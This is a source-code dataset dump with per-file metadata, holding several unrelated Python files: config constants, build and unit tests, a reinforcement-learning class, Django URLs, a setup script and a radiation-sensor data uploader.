| 43.529412 | 117 | 0.783108 | MAX_NUM_PROCESSES = 4
# GitHub API endpoint of the WishBuilder repository.
REPO_URL = 'https://api.github.com/repos/srp33/WishBuilder/'
# Filesystem locations, all rooted at WB_DIRECTORY.
WB_DIRECTORY = '/app/'
SQLITE_FILE = WB_DIRECTORY + 'WishBuilderCI/history.sql'
TESTING_LOCATION = WB_DIRECTORY + 'WishBuilderCI/testing/'
RAW_DATA_STORAGE = WB_DIRECTORY + 'RawDatasets/'
GENEY_DATA_LOCATION = WB_DIRECTORY + 'GeneyDatasets/'
GENEY_CONVERTER = WB_DIRECTORY + 'GeneyTypeConverter/typeconverter.py'
# Size limits and thresholds applied during validation.
MIN_TEST_CASES = 8
MIN_FEATURES = 2
MIN_SAMPLES = 2
MAX_TITLE_SIZE = 300
NUM_SAMPLE_ROWS = 5
NUM_SAMPLE_COLUMNS = 5
# Symbols used when rendering test reports.
CHECK_MARK = '✅'
RED_X = '❌'
WARNING_SYMBOL = "<p><font color=\"orange\" size=\"+2\">⚠\t</font>"
# File names expected in a submission / produced by the test run.
KEY_DATA_NAME = 'test_data.tsv'
KEY_META_DATA_NAME = 'test_metadata.tsv'
TEST_DATA_NAME = 'data.tsv.gz'
TEST_META_DATA_NAME = 'metadata.tsv.gz'
DOWNLOAD_FILE_NAME = 'download.sh'
INSTALL_FILE_NAME = 'install.sh'
PARSE_FILE_NAME = 'parse.sh'
CLEANUP_FILE_NAME = 'cleanup.sh'
DESCRIPTION_FILE_NAME = 'description.md'
CONFIG_FILE_NAME = 'config.yaml'
REQUIRED_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME, DOWNLOAD_FILE_NAME, INSTALL_FILE_NAME, PARSE_FILE_NAME,
                  CLEANUP_FILE_NAME, DESCRIPTION_FILE_NAME, CONFIG_FILE_NAME]
REQUIRED_CONFIGS = ['title', 'featureDescription', 'featureDescriptionPlural']
# These are the executables that will be ran to produce the data and metadata files (They are executed in this order)
USER_SCRIPTS = [INSTALL_FILE_NAME, DOWNLOAD_FILE_NAME, PARSE_FILE_NAME]
KEY_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME]
| 0 | 0 | 0 |
cd119f4b0406c659f619f425d188bf9b984db107 | 779 | py | Python | src/test/python/twitter/aurora/executor/test_executor_builds.py | isomer/incubator-aurora | 5f54d4de25413bb18acec16120eb18f3e08c6bf0 | [
"Apache-2.0"
] | null | null | null | src/test/python/twitter/aurora/executor/test_executor_builds.py | isomer/incubator-aurora | 5f54d4de25413bb18acec16120eb18f3e08c6bf0 | [
"Apache-2.0"
] | null | null | null | src/test/python/twitter/aurora/executor/test_executor_builds.py | isomer/incubator-aurora | 5f54d4de25413bb18acec16120eb18f3e08c6bf0 | [
"Apache-2.0"
] | null | null | null | import subprocess
| 35.409091 | 94 | 0.702182 | import subprocess
def build_and_execute_pex_target(target, binary):
  """Build `target` with pants and sanity-check that `binary --help` runs."""
  assert subprocess.call(["./pants", target]) == 0
  # TODO(wickman) Should we extract distdir from pants.ini?
  po = subprocess.Popen([binary, "--help"], stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
  so, se = po.communicate()
  # The built pex exits with status 1 on --help, hence the assert below.
  assert po.returncode == 1 # sigh
  assert so.startswith('Options'), 'Unexpected build output: %s' % so
def test_thermos_executor_build():
  """The thermos executor pex builds and responds to --help."""
  build_and_execute_pex_target('src/main/python/twitter/aurora/executor/bin:thermos_executor',
                               'dist/thermos_executor.pex')
def test_gc_executor_build():
  """The GC executor pex builds and responds to --help."""
  build_and_execute_pex_target('src/main/python/twitter/aurora/executor/bin:gc_executor',
                               'dist/gc_executor.pex')
| 689 | 0 | 69 |
5d4fa117effc4d8d66f7a0da2dce25e2cbedf534 | 1,140 | py | Python | rlkit/torch/her/her_twin_sac.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2020-10-23T14:40:09.000Z | 2020-10-23T14:40:09.000Z | rlkit/torch/her/her_twin_sac.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | null | null | null | rlkit/torch/her/her_twin_sac.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2021-05-27T20:38:45.000Z | 2021-05-27T20:38:45.000Z | import numpy as np
from rlkit.data_management.obs_dict_replay_buffer import \
ObsDictRelabelingBuffer
from rlkit.samplers.rollout_functions import (
create_rollout_function,
multitask_rollout,
)
from rlkit.torch.her.her import HER
from rlkit.torch.sac.sac import TwinSAC
| 27.142857 | 81 | 0.639474 | import numpy as np
from rlkit.data_management.obs_dict_replay_buffer import \
ObsDictRelabelingBuffer
from rlkit.samplers.rollout_functions import (
create_rollout_function,
multitask_rollout,
)
from rlkit.torch.her.her import HER
from rlkit.torch.sac.sac import TwinSAC
class HerTwinSAC(HER, TwinSAC):
    """Hindsight Experience Replay combined with the Twin SAC algorithm."""
    def __init__(
            self,
            *args,
            twin_sac_kwargs,
            her_kwargs,
            base_kwargs,
            **kwargs
    ):
        # Both bases are initialized explicitly (not via super()) with their
        # own keyword-argument bundles.
        HER.__init__(
            self,
            **her_kwargs,
        )
        TwinSAC.__init__(self, *args, **kwargs, **twin_sac_kwargs, **base_kwargs)
        # HER relabeling requires the dict-observation replay buffer.
        # NOTE(review): ``assert`` is stripped under ``python -O``; consider
        # raising TypeError instead.
        assert isinstance(
            self.replay_buffer, ObsDictRelabelingBuffer
        )
    @property
    def eval_rollout_function(self):
        # Rollout callable used at evaluation time; the observation/goal keys
        # are instance attributes (presumably set by HER — TODO confirm).
        return create_rollout_function(
            multitask_rollout,
            observation_key=self.observation_key,
            desired_goal_key=self.desired_goal_key,
        )
    def get_epoch_snapshot(self, epoch):
        snapshot = super().get_epoch_snapshot(epoch)
        # NOTE(review): ``update_epoch_snapshot`` is not defined in this
        # class; presumably inherited from a base class — confirm.
        HerTwinSAC.update_epoch_snapshot(self, snapshot)
        return snapshot
| 729 | 104 | 23 |
52c42f4215c8076d4bd4743f0cebe85276846322 | 618 | py | Python | test/test_modes/test_right_margin.py | haesleinhuepf/pyqode.core | 88b9bab081fd580d4de86f3d926a9f0b19146d28 | [
"MIT"
] | null | null | null | test/test_modes/test_right_margin.py | haesleinhuepf/pyqode.core | 88b9bab081fd580d4de86f3d926a9f0b19146d28 | [
"MIT"
] | null | null | null | test/test_modes/test_right_margin.py | haesleinhuepf/pyqode.core | 88b9bab081fd580d4de86f3d926a9f0b19146d28 | [
"MIT"
] | null | null | null | from pyqode.core import modes
from qtpy import QtGui
| 22.071429 | 62 | 0.686084 | from pyqode.core import modes
from qtpy import QtGui
def get_mode(editor):
    """Return the RightMarginMode instance installed on *editor*."""
    return editor.modes.get(modes.RightMarginMode)
def test_enabled(editor):
    """The mode is enabled by default and can be toggled off and back on."""
    mode = get_mode(editor)
    assert mode.enabled
    mode.enabled = False
    mode.enabled = True
def test_position(editor):
    """The margin column defaults to 79 and can be reassigned."""
    mode = get_mode(editor)
    assert mode.position == 79
    mode.position = 119
    assert mode.position == 119
def test_color(editor):
    """The margin color defaults to red and can be reassigned."""
    mode = get_mode(editor)
    assert mode.color.name() == QtGui.QColor('red').name()
    mode.color = QtGui.QColor('#00FF00')
    assert mode.color.name() == QtGui.QColor('#00FF00').name()
| 469 | 0 | 92 |
81363f5a86cd0b541192ee2d88e9420f2a25e280 | 697 | py | Python | graphsaint/kgraphsaint/utils.py | sandl99/Simple-KGCN-GraphSAINT | bb1a9e90b785315ecb501593a0ac19e6fafc2f28 | [
"MIT"
] | null | null | null | graphsaint/kgraphsaint/utils.py | sandl99/Simple-KGCN-GraphSAINT | bb1a9e90b785315ecb501593a0ac19e6fafc2f28 | [
"MIT"
] | 1 | 2021-06-17T16:41:45.000Z | 2021-06-17T16:41:46.000Z | graphsaint/kgraphsaint/utils.py | sandl99/Simple-KGCN-GraphSAINT | bb1a9e90b785315ecb501593a0ac19e6fafc2f28 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn import metrics
def reformat_train_ratings(train_data):
    """
    Sort the training rating rows by item id (second column), ascending.
    @param train_data: data ratings for train
    """
    rows = train_data.tolist()
    rows.sort(key=lambda row: row[1])
    return np.array(rows)
| 24.034483 | 74 | 0.69297 | import numpy as np
from sklearn import metrics
def build_sample(mini, args):
    """Configure the minibatch sampler from the command-line arguments."""
    phases = dict(
        sampler=args.sampler,
        size_subg_edge=args.size_subg_edge,
    )
    mini.set_sampler(phases)
def reformat_train_ratings(train_data):
    """
    Sort the training rating rows by item id (second column), ascending.
    @param train_data: data ratings for train
    """
    rows = train_data.tolist()
    rows.sort(key=lambda row: row[1])
    return np.array(rows)
def check_items_train(train_data, n_item):
    """Assert the training split covers exactly ``n_item`` distinct items."""
    distinct_items = set(train_data.T[1].tolist())
    assert n_item == len(distinct_items)
def auc_score(pred, true, average='micro'):
    """Compute ROC-AUC of scores ``pred`` against labels ``true``.
    Note the argument swap below: sklearn's signature is (y_true, y_score).
    """
    return metrics.roc_auc_score(true, pred, average=average)
| 326 | 0 | 69 |
14e28362ac46998199e56ae5ac76dbf45fbbe33a | 72 | py | Python | tests/conftest.py | ashish12/django-oscar | c0651d294bd165b9c452ab0054475b145b5a435d | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | ashish12/django-oscar | c0651d294bd165b9c452ab0054475b145b5a435d | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | ashish12/django-oscar | c0651d294bd165b9c452ab0054475b145b5a435d | [
"BSD-3-Clause"
] | null | null | null | from .config import configure
| 12 | 29 | 0.736111 | from .config import configure
def pytest_configure():
    """pytest hook: run project setup (``.config.configure``) before tests."""
    configure()
| 18 | 0 | 23 |
8b5cd81346c277def110ae0502022103ca1a5e47 | 127 | py | Python | python/testData/inspections/PyCompatibilityInspection/builtinLong.py | Sajadrahimi/intellij-community | ab9ff612dde3ee94ecae33cbc0ea639fa51550d4 | [
"Apache-2.0"
] | null | null | null | python/testData/inspections/PyCompatibilityInspection/builtinLong.py | Sajadrahimi/intellij-community | ab9ff612dde3ee94ecae33cbc0ea639fa51550d4 | [
"Apache-2.0"
] | null | null | null | python/testData/inspections/PyCompatibilityInspection/builtinLong.py | Sajadrahimi/intellij-community | ab9ff612dde3ee94ecae33cbc0ea639fa51550d4 | [
"Apache-2.0"
] | 1 | 2022-01-02T19:58:08.000Z | 2022-01-02T19:58:08.000Z | <warning descr="Python version 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 do not have type long. Use int instead.">long("abc")</warning> | 127 | 127 | 0.653543 | <warning descr="Python version 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 do not have type long. Use int instead.">long("abc")</warning> | 0 | 0 | 0 |
d9c367e4b92d9cc182956a2b6b787706a21126fc | 125 | py | Python | test_plugin_invalid/__init__.py | PetrSixta/taro | afe0caf0e0feb6948c4cc80217b5c5d11418859b | [
"MIT"
] | null | null | null | test_plugin_invalid/__init__.py | PetrSixta/taro | afe0caf0e0feb6948c4cc80217b5c5d11418859b | [
"MIT"
] | 26 | 2021-04-05T12:32:21.000Z | 2022-03-22T12:53:44.000Z | test_plugin_invalid/__init__.py | PetrSixta/taro | afe0caf0e0feb6948c4cc80217b5c5d11418859b | [
"MIT"
] | 1 | 2021-04-16T21:04:53.000Z | 2021-04-16T21:04:53.000Z | # For testing that invalid plugin raising error doesn't break the app
# Intentionally raised at import time; plugin loaders must catch this.
raise BaseException('Must be caught in plugin module')
| 41.666667 | 69 | 0.8 | # For testing that invalid plugin raising error doesn't break the app
# Intentionally raised at import time; plugin loaders must catch this.
raise BaseException('Must be caught in plugin module')
| 0 | 0 | 0 |
ef07eb3e3ab2ff2c2ea1d88be5d20b9637e07826 | 576 | py | Python | homes_json/urls.py | Xtuden-com/django-property | 6656d469a5d06c103a34c2e68b9f1754413fb3ba | [
"MIT"
] | null | null | null | homes_json/urls.py | Xtuden-com/django-property | 6656d469a5d06c103a34c2e68b9f1754413fb3ba | [
"MIT"
] | null | null | null | homes_json/urls.py | Xtuden-com/django-property | 6656d469a5d06c103a34c2e68b9f1754413fb3ba | [
"MIT"
] | null | null | null | from django.conf.urls import url
from django.views.decorators.csrf import csrf_exempt
from .views import SearchPriceView, SearchPlacesView, ContactView, FavouriteView
urlpatterns = [
url(r'prices/(?P<type>1|2)/$', SearchPriceView.as_view(), name='search_prices'),
url(r'places/(?P<name>\w+)/$', SearchPlacesView.as_view(), name='search_places'),
url(r'contact/(?P<type>sale|letting)/$', csrf_exempt(ContactView.as_view()), name='contact'),
url(r'favourite/(?P<type>sale|letting)/(?P<slug>[-\w]+)/$', csrf_exempt(FavouriteView.as_view()), name='favourite')
]
| 48 | 119 | 0.715278 | from django.conf.urls import url
from django.views.decorators.csrf import csrf_exempt
from .views import SearchPriceView, SearchPlacesView, ContactView, FavouriteView
urlpatterns = [
url(r'prices/(?P<type>1|2)/$', SearchPriceView.as_view(), name='search_prices'),
url(r'places/(?P<name>\w+)/$', SearchPlacesView.as_view(), name='search_places'),
url(r'contact/(?P<type>sale|letting)/$', csrf_exempt(ContactView.as_view()), name='contact'),
url(r'favourite/(?P<type>sale|letting)/(?P<slug>[-\w]+)/$', csrf_exempt(FavouriteView.as_view()), name='favourite')
]
| 0 | 0 | 0 |
6377d7fb104366f4b64c4f39f4e633d2c021318a | 734 | py | Python | S4/S4 Library/simulation/objects/wind/wind_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/objects/wind/wind_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/objects/wind/wind_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, Tunable, TunableTuple, TunableVariant
| 146.8 | 566 | 0.668937 | from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, Tunable, TunableTuple, TunableVariant
class WindSpeedEffect(HasTunableFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'wind_speed': TunableTuple(spin_speed=TunableVariant(description='\n The spin speed level to set for the sim.\n The locked float are fixed enums on the client.\n ', locked_args={'OFF': 0.0, 'NORMAL': 3.0, 'FAST': 8.0}, default='OFF'), transition_speed=Tunable(description='\n Set the transition speed of the object.\n The transition speed defines the speed of the\n transition between spin speeds.\n ', tunable_type=float, default=1.0))}
| 0 | 604 | 23 |
dbdfd65016b0f226f51bb7625f38cf7f676fead8 | 840 | py | Python | setup.py | samuelefiorini/vrpy | ad3232b9e9ee9276c9c799d16b4a4a8c2b41eef1 | [
"MIT"
] | null | null | null | setup.py | samuelefiorini/vrpy | ad3232b9e9ee9276c9c799d16b4a4a8c2b41eef1 | [
"MIT"
] | null | null | null | setup.py | samuelefiorini/vrpy | ad3232b9e9ee9276c9c799d16b4a4a8c2b41eef1 | [
"MIT"
] | null | null | null | import setuptools
setuptools.setup(
name="vrpy",
version="0.5.0",
description="A python framework for solving vehicle routing problems",
license="MIT",
author="Romain Montagne, David Torres",
author_email="r.montagne@hotmail.fr",
keywords=["vehicle routing problem", "vrp", "column generation"],
long_description=open("README.md", "r").read(),
long_description_content_type="text/x-rst",
url="https://github.com/Kuifje02/vrpy",
packages=setuptools.find_packages(),
install_requires=["cspy", "networkx", "numpy", "pulp"],
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 35 | 74 | 0.645238 | import setuptools
setuptools.setup(
name="vrpy",
version="0.5.0",
description="A python framework for solving vehicle routing problems",
license="MIT",
author="Romain Montagne, David Torres",
author_email="r.montagne@hotmail.fr",
keywords=["vehicle routing problem", "vrp", "column generation"],
long_description=open("README.md", "r").read(),
long_description_content_type="text/x-rst",
url="https://github.com/Kuifje02/vrpy",
packages=setuptools.find_packages(),
install_requires=["cspy", "networkx", "numpy", "pulp"],
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 0 | 0 | 0 |
42d3b314407e9baed2eab7f4b26ba75ae88160b7 | 8,411 | py | Python | data_handler.py | emily20270/dosenet-raspberrypi | f18ebbdb1728fc94b4c358e7b93a4751b203acd5 | [
"MIT"
] | null | null | null | data_handler.py | emily20270/dosenet-raspberrypi | f18ebbdb1728fc94b4c358e7b93a4751b203acd5 | [
"MIT"
] | null | null | null | data_handler.py | emily20270/dosenet-raspberrypi | f18ebbdb1728fc94b4c358e7b93a4751b203acd5 | [
"MIT"
] | 1 | 2018-09-13T17:35:33.000Z | 2018-09-13T17:35:33.000Z | from auxiliaries import datetime_from_epoch
from auxiliaries import set_verbosity
from globalvalues import ANSI_RESET, ANSI_YEL, ANSI_GR, ANSI_RED
from globalvalues import NETWORK_LED_BLINK_PERIOD_S
from globalvalues import DEFAULT_DATA_BACKLOG_FILE
from globalvalues import CPM_DISPLAY_TEXT
from globalvalues import strf, FLUSH_PAUSE_S
from collections import deque
import socket
import time
import ast
import os
import errno
class Data_Handler(object):
"""
Object for sending data to server.
Also handles writing to datalog and
storing to memory.
"""
def test_send(self, cpm, cpm_err):
"""
Test Mode
"""
self.vprint(
1, ANSI_RED + " * Test mode, not sending to server * " +
ANSI_RESET)
def no_config_send(self, cpm, cpm_err):
"""
Configuration file not present
"""
self.vprint(1, "Missing config file, not sending to server")
def no_publickey_send(self, cpm, cpm_err):
"""
Publickey not present
"""
self.vprint(1, "Missing public key, not sending to server")
def send_to_memory(self, cpm, cpm_err):
"""
Network is not up
"""
if self.led:
self.led.start_blink(interval=self.blink_period_s)
self.send_to_queue(cpm, cpm_err)
self.vprint(1, "Network down, saving to queue in memory")
def regular_send(self, this_end, cpm, cpm_err):
"""
Normal send. Socket errors are handled in the main method.
"""
if self.led:
if self.led.blinker:
self.led.stop_blink()
self.led.on()
self.manager.sender.send_cpm_new(this_end, cpm, cpm_err)
if self.queue:
self.vprint(1, "Flushing memory queue to server")
no_error_yet = True
while self.queue and no_error_yet:
time.sleep(FLUSH_PAUSE_S)
trash = self.queue.popleft()
try:
self.manager.sender.send_cpm_new(
trash[0], trash[1], trash[2])
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1, 'Failed to send packet! ' +
'Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! ' +
'Network is unreachable')
else:
# consider handling errno.ECONNABORTED,
# errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(trash[0], trash[1], trash[2])
no_error_yet = False
else:
self.manager.sender.send_cpm(cpm, cpm_err)
def send_to_queue(self, cpm, cpm_err):
"""
Adds the time, cpm, and cpm_err to the deque object.
"""
time_string = time.time()
self.queue.append([time_string, cpm, cpm_err])
def backlog_to_queue(self, path=DEFAULT_DATA_BACKLOG_FILE):
"""
Sends data in backlog to queue and deletes the backlog
"""
if os.path.isfile(path):
self.vprint(2, "Flushing backlog file to memory queue")
with open(path, 'r') as f:
data = f.read()
data = ast.literal_eval(data)
for i in data:
self.queue.append([i[0], i[1], i[2]])
print(self.queue)
os.remove(path)
def main(self, datalog, cpm, cpm_err, this_start, this_end, counts):
"""
Determines how to handle the cpm data.
"""
start_text = datetime_from_epoch(this_start).strftime(strf)
end_text = datetime_from_epoch(this_end).strftime(strf)
self.vprint(
1, CPM_DISPLAY_TEXT.format(
time=datetime_from_epoch(time.time()),
counts=counts,
cpm=cpm,
cpm_err=cpm_err,
start_time=start_text,
end_time=end_text))
self.manager.data_log(datalog, cpm=cpm, cpm_err=cpm_err)
if self.manager.test:
# for testing the memory queue
self.send_to_memory(cpm, cpm_err)
elif not self.manager.config:
self.no_config_send(cpm, cpm_err)
elif not self.manager.publickey:
self.no_publickey_send(cpm, cpm_err)
else:
try:
self.regular_send(this_end, cpm, cpm_err)
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1,
'Failed to send packet! Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! Network is unreachable')
else:
# consider handling errno.ECONNABORTED errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(cpm, cpm_err)
| 37.717489 | 79 | 0.499822 | from auxiliaries import datetime_from_epoch
from auxiliaries import set_verbosity
from globalvalues import ANSI_RESET, ANSI_YEL, ANSI_GR, ANSI_RED
from globalvalues import NETWORK_LED_BLINK_PERIOD_S
from globalvalues import DEFAULT_DATA_BACKLOG_FILE
from globalvalues import CPM_DISPLAY_TEXT
from globalvalues import strf, FLUSH_PAUSE_S
from collections import deque
import socket
import time
import ast
import os
import errno
class Data_Handler(object):
"""
Object for sending data to server.
Also handles writing to datalog and
storing to memory.
"""
def __init__(self,
manager=None,
verbosity=1,
logfile=None,
network_led=None,
):
self.v = verbosity
if manager and logfile is None:
set_verbosity(self, logfile=manager.logfile)
else:
set_verbosity(self, logfile=logfile)
self.manager = manager
self.queue = deque('')
self.blink_period_s = NETWORK_LED_BLINK_PERIOD_S
self.led = network_led
def test_send(self, cpm, cpm_err):
"""
Test Mode
"""
self.vprint(
1, ANSI_RED + " * Test mode, not sending to server * " +
ANSI_RESET)
def no_config_send(self, cpm, cpm_err):
"""
Configuration file not present
"""
self.vprint(1, "Missing config file, not sending to server")
def no_publickey_send(self, cpm, cpm_err):
"""
Publickey not present
"""
self.vprint(1, "Missing public key, not sending to server")
def send_to_memory(self, cpm, cpm_err):
"""
Network is not up
"""
if self.led:
self.led.start_blink(interval=self.blink_period_s)
self.send_to_queue(cpm, cpm_err)
self.vprint(1, "Network down, saving to queue in memory")
def regular_send(self, this_end, cpm, cpm_err):
"""
Normal send. Socket errors are handled in the main method.
"""
if self.led:
if self.led.blinker:
self.led.stop_blink()
self.led.on()
self.manager.sender.send_cpm_new(this_end, cpm, cpm_err)
if self.queue:
self.vprint(1, "Flushing memory queue to server")
no_error_yet = True
while self.queue and no_error_yet:
time.sleep(FLUSH_PAUSE_S)
trash = self.queue.popleft()
try:
self.manager.sender.send_cpm_new(
trash[0], trash[1], trash[2])
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1, 'Failed to send packet! ' +
'Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! ' +
'Network is unreachable')
else:
# consider handling errno.ECONNABORTED,
# errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(trash[0], trash[1], trash[2])
no_error_yet = False
else:
self.manager.sender.send_cpm(cpm, cpm_err)
def send_all_to_backlog(self, path=DEFAULT_DATA_BACKLOG_FILE):
if self.queue:
self.vprint(1, "Flushing memory queue to backlog file")
with open(path, 'a') as f:
while self.queue:
f.write('{0}, '.format(self.queue.popleft()))
def send_to_queue(self, cpm, cpm_err):
"""
Adds the time, cpm, and cpm_err to the deque object.
"""
time_string = time.time()
self.queue.append([time_string, cpm, cpm_err])
def backlog_to_queue(self, path=DEFAULT_DATA_BACKLOG_FILE):
"""
Sends data in backlog to queue and deletes the backlog
"""
if os.path.isfile(path):
self.vprint(2, "Flushing backlog file to memory queue")
with open(path, 'r') as f:
data = f.read()
data = ast.literal_eval(data)
for i in data:
self.queue.append([i[0], i[1], i[2]])
print(self.queue)
os.remove(path)
def main(self, datalog, cpm, cpm_err, this_start, this_end, counts):
"""
Determines how to handle the cpm data.
"""
start_text = datetime_from_epoch(this_start).strftime(strf)
end_text = datetime_from_epoch(this_end).strftime(strf)
self.vprint(
1, CPM_DISPLAY_TEXT.format(
time=datetime_from_epoch(time.time()),
counts=counts,
cpm=cpm,
cpm_err=cpm_err,
start_time=start_text,
end_time=end_text))
self.manager.data_log(datalog, cpm=cpm, cpm_err=cpm_err)
if self.manager.test:
# for testing the memory queue
self.send_to_memory(cpm, cpm_err)
elif not self.manager.config:
self.no_config_send(cpm, cpm_err)
elif not self.manager.publickey:
self.no_publickey_send(cpm, cpm_err)
else:
try:
self.regular_send(this_end, cpm, cpm_err)
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1,
'Failed to send packet! Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! Network is unreachable')
else:
# consider handling errno.ECONNABORTED errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(cpm, cpm_err)
| 755 | 0 | 54 |
5230433bb85e139f7e5d49424d131fe9e93581eb | 324 | py | Python | linum/excel_renderer/calendar/space/space_row.py | chabErch/Linum | e32ec01f0b43cfb03fd33ad90cf25df9a0c6565f | [
"MIT"
] | null | null | null | linum/excel_renderer/calendar/space/space_row.py | chabErch/Linum | e32ec01f0b43cfb03fd33ad90cf25df9a0c6565f | [
"MIT"
] | null | null | null | linum/excel_renderer/calendar/space/space_row.py | chabErch/Linum | e32ec01f0b43cfb03fd33ad90cf25df9a0c6565f | [
"MIT"
] | null | null | null | from typing import Type
from linum.excel_renderer.base.date_cell import DateCell
from linum.excel_renderer.base.date_row import DateRow
from linum.excel_renderer.calendar.space.space_cell import SpaceCell
| 24.923077 | 68 | 0.796296 | from typing import Type
from linum.excel_renderer.base.date_cell import DateCell
from linum.excel_renderer.base.date_row import DateRow
from linum.excel_renderer.calendar.space.space_cell import SpaceCell
class SpaceRow(DateRow):
@property
def _date_cell_class(self) -> Type[SpaceCell]:
return SpaceCell
| 50 | 44 | 23 |